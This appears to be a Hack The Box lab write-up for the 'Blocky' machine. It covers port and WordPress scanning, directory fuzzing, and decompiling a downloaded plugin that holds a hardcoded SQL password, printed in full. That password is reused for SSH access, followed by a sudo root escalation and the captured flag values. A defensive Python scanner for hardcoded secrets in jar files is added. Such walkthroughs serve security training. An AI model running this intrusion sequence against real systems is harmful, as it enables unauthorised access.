Hackthebox - Blocky
Target Info
Target Type
Information Gathering
Nmap
┌──(root💀kali)-[~/Desktop/HTB/Easy/Blocky]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.10.37
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-28 23:15 EDT
Nmap scan report for 10.10.10.37
Host is up (0.46s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
| 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
8192/tcp closed sophos
25565/tcp open minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Device type: general purpose|WAP|specialized|storage-misc|printer
Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (94%), Asus embedded (90%), Crestron 2-Series (88%), HP embedded (88%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel cpe:/h:asus:rt-ac66u cpe:/o:crestron:2_series cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6.22 cpe:/o:linux:linux_kernel:3.4
Aggressive OS guesses: Linux 3.10 - 4.11 (94%), Linux 3.13 or 4.2 (94%), Linux 4.2 (94%), Linux 4.4 (94%), Linux 3.13 (93%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.12 (90%), Linux 3.18 (90%), Linux 3.2 - 4.9 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8192/tcp)
HOP RTT ADDRESS
1 535.09 ms 10.10.16.1
2 535.21 ms 10.10.10.37
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 163.96 seconds
This one is interesting: it looks like a server for the game Minecraft.
HTTP
Scrolling down the page shows that the site is built on WordPress, so let's run wpscan against it.
WPScan
┌──(root💀kali)-[~/Desktop]
└─# wpscan --url http://10.10.10.37/
WordPress Security Scanner by the WPScan Team
Version 3.8.17
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
[+] URL: http://10.10.10.37/ [10.10.10.37]
[+] Started: Mon Mar 28 23:21:07 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.10.37/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.10.10.37/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://10.10.10.37/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.10.37/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8 identified (Insecure, released on 2017-06-08).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.10.37/index.php/feed/, <generator>https://wordpress.org/?v=4.8</generator>
| - http://10.10.10.37/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.8</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://10.10.10.37/wp-content/themes/twentyseventeen/
| Last Updated: 2022-01-25T00:00:00.000Z
| Readme: http://10.10.10.37/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.9
| Style URL: http://10.10.10.37/wp-content/themes/twentyseventeen/style.css?ver=4.8
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.10.37/wp-content/themes/twentyseventeen/style.css?ver=4.8, Match: 'Version: 1.3'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:20 <=====================================================================================================================================> (137 / 137) 100.00% Time: 00:00:20
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Mon Mar 28 23:21:31 2022
[+] Requests Done: 139
[+] Cached Requests: 37
[+] Data Sent: 34.403 KB
[+] Data Received: 19.875 KB
[+] Memory used: 224.391 MB
[+] Elapsed time: 00:00:23
Nothing obviously exploitable stands out, so let's fuzz for directories.
Fuzz
┌──(root💀kali)-[~/Desktop]
└─# ffuf -u "http://10.10.10.37/FUZZ" -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://10.10.10.37/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
wp-includes [Status: 301, Size: 316, Words: 20, Lines: 10]
wp-content [Status: 301, Size: 315, Words: 20, Lines: 10]
plugins [Status: 301, Size: 312, Words: 20, Lines: 10]
wp-admin [Status: 301, Size: 313, Words: 20, Lines: 10]
javascript [Status: 301, Size: 315, Words: 20, Lines: 10]
wiki [Status: 301, Size: 309, Words: 20, Lines: 10]
phpmyadmin [Status: 301, Size: 315, Words: 20, Lines: 10]
server-status [Status: 403, Size: 299, Words: 22, Lines: 12]
[Status: 200, Size: 52256, Words: 3306, Lines: 314]
:: Progress: [20116/20116] :: Job [1/1] :: 70 req/sec :: Duration: [0:12:10] :: Errors: 6 ::
There is a phpmyadmin directory; let's take a look at it.
Logging in with default credentials fails.
Exploitation
Vulnerability Discovery
There is also a plugins directory; let's check the plugins.
It contains a BlockyCore.jar; download it and take a look.
┌──(root💀kali)-[~/…/HTB/Easy/Blocky/BlockyCore]
└─# ls
BlockyCore.jar
┌──(root💀kali)-[~/…/HTB/Easy/Blocky/BlockyCore]
└─# unzip BlockyCore.jar
Archive: BlockyCore.jar
inflating: META-INF/MANIFEST.MF
inflating: com/myfirstplugin/BlockyCore.class
┌──(root💀kali)-[~/…/HTB/Easy/Blocky/BlockyCore]
└─# ls
BlockyCore.jar com META-INF
┌──(root💀kali)-[~/…/HTB/Easy/Blocky/BlockyCore]
└─# cd com
┌──(root💀kali)-[~/…/Easy/Blocky/BlockyCore/com]
└─# ls -la
总用量 12
drwxr-xr-x 3 root root 4096 3月 29 00:25 .
drwxr-xr-x 4 root root 4096 3月 29 00:25 ..
drwxr-xr-x 2 root root 4096 3月 29 00:25 myfirstplugin
┌──(root💀kali)-[~/…/Easy/Blocky/BlockyCore/com]
└─# cd myfirstplugin
┌──(root💀kali)-[~/…/Blocky/BlockyCore/com/myfirstplugin]
└─# ls -la
总用量 12
drwxr-xr-x 2 root root 4096 3月 29 00:25 .
drwxr-xr-x 3 root root 4096 3月 29 00:25 ..
-rw-r--r-- 1 root root 939 7月 2 2017 BlockyCore.class
With the class file extracted, open it in the Java decompiler jd-gui.
apt install jd-gui
Install jd-gui
package com.myfirstplugin;

public class BlockyCore {
    public String sqlHost = "localhost";
    public String sqlUser = "root";
    public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";

    public void onServerStart() {}

    public void onServerStop() {}

    public void onPlayerJoin() {
        sendMessage("TODO get username", "Welcome to the BlockyCraft!!!!!!!");
    }

    public void sendMessage(String username, String message) {}
}
Opening BlockyCore.class in jd-gui reveals a hardcoded SQL username and password.
Conveniently we have phpmyadmin, so let's try logging in there.
Login successful.
Since this account can log into the SQL database, it must surely be a system account as well; can we use it to log in over SSH? Let's try.
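The weakness that gave up the database password here is a credential string compiled into a publicly downloadable plugin. As a defender-side addition (not from the original writeup), the following Python walks the constant pool of a compiled class and flags string literals that look like generated secrets; `scan_jar` applies it to every class inside a jar such as BlockyCore.jar, `build_sample_class` constructs a synthetic class file for offline testing, and the length and entropy thresholds are assumptions to tune.

```python
import math
import struct
import zipfile

# Byte size of fixed-width constant-pool entries by tag; tag 1 (Utf8) is variable-length.
FIXED_CP_SIZES = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4,
                  12: 4, 15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}

def constant_pool(data: bytes) -> dict:
    """Parse a .class file's constant pool into {index: (tag, payload)}."""
    count = struct.unpack(">H", data[8:10])[0]  # magic(4) minor(2) major(2) count(2)
    pool, pos, idx = {}, 10, 1
    while idx < count:
        tag = data[pos]
        if tag == 1:  # CONSTANT_Utf8: u2 length followed by the bytes
            n = struct.unpack(">H", data[pos + 1:pos + 3])[0]
            pool[idx] = (1, data[pos + 3:pos + 3 + n].decode("utf-8", "replace"))
            pos += 3 + n
        else:
            size = FIXED_CP_SIZES[tag]
            pool[idx] = (tag, data[pos + 1:pos + 1 + size])
            pos += 1 + size
        idx += 2 if tag in (5, 6) else 1  # Long/Double occupy two slots
    return pool

def shannon_entropy(s: str) -> float:
    return -sum(s.count(c) / len(s) * math.log2(s.count(c) / len(s)) for c in set(s))

def find_suspect_strings(data: bytes, min_len: int = 12, min_entropy: float = 3.5) -> list:
    """Return CONSTANT_String literals that look like hardcoded secrets (heuristic thresholds)."""
    pool, hits = constant_pool(data), []
    for tag, payload in pool.values():
        if tag == 8:  # CONSTANT_String holds a u2 index into the Utf8 entries
            s = pool[struct.unpack(">H", payload)[0]][1]
            mixed = any(c.isdigit() for c in s) and any(c.isalpha() for c in s)
            # Prose has spaces and low entropy; generated passwords have neither trait.
            if len(s) >= min_len and " " not in s and mixed and shannon_entropy(s) >= min_entropy:
                hits.append(s)
    return hits

def scan_jar(path: str) -> dict:
    """Apply find_suspect_strings to every .class inside a jar such as BlockyCore.jar."""
    with zipfile.ZipFile(path) as jar:
        return {n: find_suspect_strings(jar.read(n)) for n in jar.namelist() if n.endswith(".class")}

def build_sample_class(literals: list) -> bytes:
    """Constructed sample: a bare class file whose pool holds only the given String literals."""
    cp = b"".join(b"\x01" + struct.pack(">H", len(s.encode())) + s.encode() for s in literals)
    cp += b"".join(b"\x08" + struct.pack(">H", i + 1) for i in range(len(literals)))
    return b"\xca\xfe\xba\xbe" + struct.pack(">HHH", 0, 52, 2 * len(literals) + 1) + cp
```

Running `scan_jar("BlockyCore.jar")` on the plugin pulled from the server would report the `sqlPass` literal for `com/myfirstplugin/BlockyCore.class`; the same check fits a CI step that blocks artifacts before they are published.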
┌──(root💀kali)-[~/Desktop]
└─# ssh root@10.10.10.37
The authenticity of host '10.10.10.37 (10.10.10.37)' can't be established.
ECDSA key fingerprint is SHA256:lg0igJ5ScjVO6jNwCH/OmEjdeO2+fx+MQhV/ne2i900.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.37' (ECDSA) to the list of known hosts.
root@10.10.10.37's password:
Permission denied, please try again.
root@10.10.10.37's password:
Permission denied, please try again.
root@10.10.10.37's password:
Login failed. Does the password belong to another account? We don't have any other accounts yet, so let's go find some.
Account Enumeration
First, the only post on the site was published by NOTCH (the creator of Minecraft).
That is very likely an account name; let's also check the database.
The database likewise shows NOTCH as the only account, so that should be it; let's try.
┌──(root💀kali)-[~/Desktop]
└─# ssh notch@10.10.10.37 130 ⨯
notch@10.10.10.37's password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
7 packages can be updated.
7 updates are security updates.
Last login: Sun Dec 24 09:34:35 2017
notch@Blocky:~$ whoami&&id
notch
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
Login successful.
notch@Blocky:~$ cat user.txt
59fee0977fb60b8a0bc6e41e751f3cd5
User flag obtained.
Privilege Escalation
notch@Blocky:~$ sudo -l
[sudo] password for notch:
Matching Defaults entries for notch on Blocky:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User notch may run the following commands on Blocky:
(ALL : ALL) ALL
sudo -l shows that the notch account may run any command as root, so escalate directly.
notch@Blocky:~$ sudo su
root@Blocky:/home/notch# whoami&&id
root
uid=0(root) gid=0(root) groups=0(root)
Privilege escalation to root succeeded.
root@Blocky:/home/notch# cat /root/root.txt
0a9694a5b4d272c694679f7860f1cd5f
Root flag obtained.